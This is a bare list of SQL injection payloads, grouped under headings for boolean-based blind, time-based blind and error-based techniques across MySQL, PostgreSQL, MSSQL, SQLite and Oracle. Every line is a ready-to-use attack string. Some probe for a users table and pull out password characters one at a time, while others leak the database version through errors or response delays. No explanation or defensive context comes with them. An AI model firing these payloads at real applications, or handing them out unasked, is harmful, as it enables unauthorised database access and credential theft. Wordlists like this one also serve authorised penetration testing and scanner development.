# Boolean-based blind
' AND 1=1--
' AND 1=2--
' AND 'a'='a
' AND 'a'='b
' AND substring(version(),1,1)='5'--
' AND (SELECT COUNT(*) FROM users)>0--
' AND (SELECT LENGTH(password) FROM users LIMIT 1)>5--
' AND (SELECT SUBSTRING(password,1,1) FROM users LIMIT 1)='a'--

# Time-based blind - MySQL
' AND SLEEP(5)--
' AND IF(1=1,SLEEP(5),0)--
' AND IF(substring(version(),1,1)='5',SLEEP(5),0)--
' AND IF((SELECT COUNT(*) FROM users)>0,SLEEP(5),0)--
1' AND (SELECT SLEEP(5) FROM users WHERE username='admin' AND SUBSTRING(password,1,1)='a')--

# Time-based blind - PostgreSQL
'; SELECT pg_sleep(5)--
' AND (SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END)--

# Time-based blind - MSSQL
'; WAITFOR DELAY '0:0:5'--
' AND IF 1=1 WAITFOR DELAY '0:0:5'--

# Time-based blind - SQLite
' AND 1=randomblob(500000000)--

# Time-based blind - Oracle
' AND 1=DBMS_PIPE.RECEIVE_MESSAGE('a',5)--

# Error-based - MySQL
' AND EXTRACTVALUE(1,CONCAT(0x7e,version()))--
' AND UPDATEXML(1,CONCAT(0x7e,version()),1)--

# Error-based - PostgreSQL
' AND 1=CAST(version() AS INTEGER)--

# Error-based - MSSQL
' AND 1=CONVERT(INT,@@version)--
